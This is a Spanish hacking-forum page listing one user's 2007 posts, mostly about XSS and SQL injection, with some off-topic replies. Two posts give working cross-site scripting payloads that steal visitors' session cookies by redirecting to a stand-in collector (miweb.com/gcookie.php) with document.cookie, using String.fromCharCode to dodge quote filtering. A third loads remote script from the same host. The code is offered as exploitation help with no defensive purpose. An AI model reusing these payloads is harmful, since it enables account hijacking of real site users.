elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ... 42
41  Seguridad Informática / Nivel Web / Re: Blind Sql /Xpath injection en: 11 Diciembre 2007, 16:38 pm
Citar
42  Informática / Tutoriales - Documentación / Re: Índice de temas [25/11/07] en: 25 Noviembre 2007, 18:00 pm
Acabo de actualizarlo, había un par de temas pendientes...

Gracias por los comentarios.

PD: Pox1, busca en redes P2P, eMule mismo. Es difícil dar con vídeos de break dance en descarga directa. Si te gusta el break dance, te recomiendo esta película; You Got Served, suerte!
43  Seguridad Informática / Nivel Web / Re: XSS en Zone-H en: 29 Octubre 2007, 23:44 pm
Citar
44  Seguridad Informática / Nivel Web / Re: Ayuda Con XSS en: 13 Octubre 2007, 12:23 pm
Citar
45  Seguridad Informática / Nivel Web / Re: Xss en smf 1.1.4? en: 10 Octubre 2007, 16:16 pm
Sería un tema a debatir, el de si los programadores, conscientemente, no establecieron un sistema de filtración en la variable de los nombres de los subforos y de los grupos...

Que no exista tal protección en un sistema de noticias puede ser pasable, ¿pero qué utilidad puede tener alterar el contenido a visualizar de dos variables cuya única función es mostrar un dato constante e informativo? Estoy hablando de los módulos manageboards y membergroups...

A pesar de los daños que podrían ocasionar estos ataques, existen las sesiones de identificación, las cuales nos protegen contra posibles actos no deseados, en nuestro foro, al visitar cierto tipo de páginas Web con código malicioso.

Hablo de la ejecución de ciertas operaciones mediante formularios que se auto envían al visitar una página Web, previamente manipulada para ello, claro ésta. Si desconocemos el identificador de sesión, que es un combinación alfanumérica generada pseudo-aleatoriamente en cada sesión, no podremos ejecutar esa serie de operaciones.

Conclusión... no hay peligro inminente.
46  Seguridad Informática / Nivel Web / Re: Bug de Fotolog??? en: 7 Octubre 2007, 20:55 pm
Clasifiquemoslo como un fallo de diseño, pues al parecer no puede ser explotado maliciosamente...

Reporta el fallo mediante el siguiente formulario: http://account.fotolog.com/help
47  Seguridad Informática / Nivel Web / Re: [?] Duda XSS en: 30 Septiembre 2007, 14:12 pm
Quizás esto te pueda ayudar...

Código
  1. <script>
  2.  
  3. var url = "http://miweb.com/gcookie.php?c=";
  4.  
  5. function str2asc (str) {
  6. var temp = '';
  7. for (i=0;i<str.length;i++) {
  8. temp += str.charCodeAt(i);
  9. if (i!=str.length-1) { temp += ','; }
  10. }
  11.  
  12. return temp;
  13. }
  14.  
  15. document.write("window.location=String.fromCharCode("+str2asc(url)+")+escape(document.cookie);");
  16.  
  17. </script>
48  Seguridad Informática / Nivel Web / Re: [?] Duda XSS en: 30 Septiembre 2007, 02:40 am
Debes transformar la cadena que se encuentra entre comillas simples a ASCII para usarla con el método que te mencioné...

Citar
>"><script>window.location=String.fromCharCode(X)+escape(document.cookie);</script>

Donde X ha de ir la página Web junto a la variable que recogerá la cookie, escrita carácter a carácter en ASCII, separado cada uno por una coma.

PD: La función escape se utiliza para escapar los saltos de línea, así evitaremos posibles perdidas por parte de la cookie.
49  Seguridad Informática / Nivel Web / Re: [?] Duda XSS en: 29 Septiembre 2007, 14:29 pm
Examina el código fuente de la página Web una vez inyectado el código para verificar que éste sea correcto. Aunque en tu caso supongo que será por que las comillas simples se encuentran filtradas, y bien desaparecen cuando se inyectan, o una contra barra pasa a formar parte de la comillas simples para que ésta escape \'.

Prueba a utilizar comillas dobles a ver si sucede lo mismo, y si no, haz una inclusión del código JS a ejecutar:

Código
  1. <script src=http://miweb.com/script.js></script>

También puedes utilizar el método del objeto String, fromCharCode... He aquí un ejemplo:

Código
  1. <script>alert(String.fromCharCode(65,66,67))</script>
50  Media / Juegos y Consolas / Re: Crear server Counter strike 1.6 NO STEAM con sxe injected en: 26 Septiembre 2007, 22:06 pm
Si yo le doy de comer a un perro callejero y éste satisface sus necesidades, probablemente al día siguiente lo volveré a ver, pidiéndome lo qué en un principio le dí de mi propia mano.

No, no te estoy comparando con un perro, solo digo, que veo más productivo concienciar al usuario de que existe un buscador, y que en el tiempo en el que tarda uno en escribir un tema, es posible encontrar posibles respuesta a esas preguntas.

¿Sé usar Google? Yo creo que hasta un mono podría usarlo si tuviera la inteligencia más desarrollada. ¿Es un mono más listo que tú? mmm, no...
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ... 42
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines